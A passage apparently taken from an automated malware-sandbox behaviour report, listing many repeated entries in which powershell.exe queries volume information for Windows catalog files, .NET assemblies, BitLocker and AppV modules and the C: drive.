                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
